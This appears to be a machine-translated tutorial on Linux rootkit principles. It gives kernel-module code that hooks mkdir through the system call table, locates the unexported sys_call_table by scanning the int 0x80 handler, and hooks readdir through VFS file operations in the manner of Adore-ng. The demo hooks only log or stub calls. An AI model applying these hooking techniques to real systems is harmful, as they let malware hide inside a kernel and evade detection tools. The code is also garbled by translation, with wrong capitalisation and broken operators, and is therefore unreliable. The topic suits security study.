Principles of rootkit

The above is an article about rootkit that can be seen everywhere on the Internet. With a dialectical attitude, I read about things that I had learned N years ago. There are also some things worth learning from.

Because getdents64 () is a system call, to intervene in it, it can only be in the kernel, through the driver method, in Linux is the LKM method. There are currently two ways to "intervene ".

1. getdents64 call item of the Hook system call table
First look at the Code:

# Include <linux/module. h>
# Include <linux/kernel. h>
# Include <asm/unistd. h>
# Include <sys/syscall. h>
# Include <linux/types. h>
# Include <linux/dirent. h>
# Include <linux/string. h>
# Include <linux/fs. h>
# Include <linux/malloc. h>
MODULE_LICENSE ("GPL ");
Extern void * sys_call_table [];/* sys_call_table is exported, so we can accessit. But in some system this will cause problem */
Int (* orig_mkdir) (const char * path);/* the original systemcall */
Int hacked_mkdir (const char * path)
{
Return 0;/* everything is OK, but he new systemcall does nothing */
}
Int init_module (void)/* module setup */
{
Orig_mkdir = sys_call_table [SYS_mkdir];
Sys_call_table [SYS_mkdir] = hacked_mkdir;
Return 0;
}
Void cleanup_module (void)/* module shutdown */
{
Sys_call_table [SYS_mkdir] = orig_mkdir;
/* Set mkdir syscall to the origal one */
} Copy the code

The above code can be used to see the process !!! I don't know where the search can be obtained. There is a premise for using this method to implement system calling, that is, the system must export the sys_call_table kernel symbol, but in 2.6, sys_call_table is no longer exported. That is to say, the system call table address cannot be obtained through the simple extern void * sys_call_table []; in the module. Fortunately, even if the kernel does not export sys_call_table, you can find its address in the memory. The following is its implementation method:

# Include <linux/kernel. h>
# Include <linux/module. h>
# Include <linux/init. h>
# Include <linux/sched. h>
# Include <asm/unistd. h>
MODULE_LICENSE ("GPL ");

Unsigned long * sys_call_table = NULL;
Asmlinkage int (* orig_mkdir) (const char *, int );
Struct _ idt
{
Unsigned short offset_low, segment_sel;
Unsigned char reserved, flags;
Unsigned short offset_high;
};
Unsigned long * getscTable (){
Unsigned char idtr [6], * shell, * sort;
Struct _ idt * idt;
Unsigned long system_call, sct;
Unsigned short offset_low, offset_high;
Char * p;
Int I;
/* Get the interrupt descriptor table */
_ Asm _ ("sidt % 0": "= m" (idtr ));
/* Get the address of system_call */
Idt = (struct _ idt *) (* (unsigned long *) & idtr [2] + 8*0x80 );
Offset_low = idt-> offset_low;
Offset_high = idt-> offset_high;
System_call = (offset_high <16) | offset_low;
Shell = (char *) system_call;
Sort = "\ xff \ x14 \ x85 ";
/* Get the address of sys_call_table */
For (I = 0; I <(100-2); I ++)
If (shell [I] = sort [0] & shell [I + 1] = sort [1] & shell [I + 2] = sort [2])
Break;
P = & shell [I];
P + = 3;
Sct = * (unsigned long *) p;
Return (unsigned long *) (sct );
}
Asmlinkage int hacked_mkdir (const char * pathname, int mode ){
Printk ("PID % d called sys_mkdir! \ N ", current-> pid );
Return orig_mkdir (pathname, mode );
}
Static int _ init find_init (void ){
Sys_call_table = getscTable ();
Orig_mkdir = (int (*) (const char *, int) sys_call_table [_ NR_mkdir];
Sys_call_table [_ NR_mkdir] = (unsigned long) hacked_mkdir;
Return 0;
}
Static void _ exit find_cleanup (void ){
Sys_call_table [_ NR_mkdir] = (unsigned long) orig_mkdir;
}
Module_init (find_init );
Module_exit (find_cleanup); copy the code

GetscTable () is a function used to find the sys_call_table address in the memory. Every system call enters the core through an int 0x80 interrupt. The Interrupt Descriptor Table maps the interrupt service program with the interrupt vector. For system calls, the operating system calls the system_call to interrupt the service program. The system_call function finds and calls the corresponding system call service routine in the system call table based on the system call number. The idtr register points to the start address of the Interrupt Descriptor Table, and uses _ asm _ ("sidt % 0": "= m" (idtr). The command gets the start address of the Interrupt Descriptor Table, the pointer obtained from this command can obtain the location of the int 0x80 interrupt server descriptor, and then calculate the address of the system_call function. Decompile the system_call function. We can see that within the system_call function, the call sys_call_table command is used to call the system call function.
Therefore, you only need to find the machine command of the call sys_call_table (, eax, 4) command in system_call to obtain the entry address of the system call table.
This method of using the hook system to call tables has been popular in Linux rootkit for a while, but now it has become a thing of the past, because the anti-hacker software checks the system call table (compared with the backup of the Clean System Call table), it can find the hacker software resident. You can check with rkhunter and chkrootkit !!!

2. Adore-ng rootkit provides a new method. Simply put, the system call is intercepted by modifying the function jump table of the vfs file system. This method does not need to be called by the system call table.
By modifying the relevant function pointer in VFS (Virtual File Switch) to hide files, this is a relatively new method and a headache for anti-hacker software. The so-called VFS is a file system model abstracted by Linux on the actual file system. Each specific file system, such as ext3 and vfat, is a subclass of the abstract class VFS, I don't know much about this either.
Adore-ng rootkit provides a new method. Simply put, the system call is intercepted by modifying the function jump table of the vfs file system. This method does not need to be called by the system call table. In the next article, I will analyze the Adore-ng source code.
The implementation method is as follows:
# Include <linux/sched. h>
# Include <linux/module. h>
# Include <linux/kernel. h>
# Include <linux/init. h>
# Include <linux/fs. h>
# Include <linux/file. h>
MODULE_LICENSE ("GPL ");
Char * root_fs = "/";
Typedef int (* readdir_t) (struct file *, void *, filldir_t );
Readdir_t orig_root_readdir = NULL;
Int myreaddir (struct file * fp, void * buf, filldir_t filldir)
{
Int r;
Printk ("<1> You got me partner! \ N ");
R = orig_root_readdir (fp, buf, filldir );
Return r;
}
Int patch_vfs (const char * p, readdir_t * orig_readdir, readdir_t new_readdir)
{
Struct file * filep;
Filep = filp_open (p, O_RDONLY, 0 );
If (IS_ERR (filep ))
Return-1;
If (orig_readdir)
* Orig_readdir = filep-> f_op-> readdir;
Filep-> f_op-> readdir = new_readdir;
Filp_close (filep, 0 );
Return 0;
}
Int unpatch_vfs (const char * p, readdir_t orig_readdir)
{
Struct file * filep;
Filep = filp_open (p, O_RDONLY, 0 );
If (IS_ERR (filep ))
Return-1;
Filep-> f_op-> readdir = orig_readdir;
Filp_close (filep, 0 );
Return 0;
}
Static int patch_init (void)
{
Patch_vfs (root_fs, & orig_root_readdir, myreaddir );
Printk ("<1> VFS is patched! \ N ");
Return 0;
}
Static void patch_cleanup (void)
{
Unpatch_vfs (root_fs, orig_root_readdir );
Printk ("<1> VFS is unpatched! \ N ");
}
Module_init (patch_init );
Module_exit (patch_cleanup );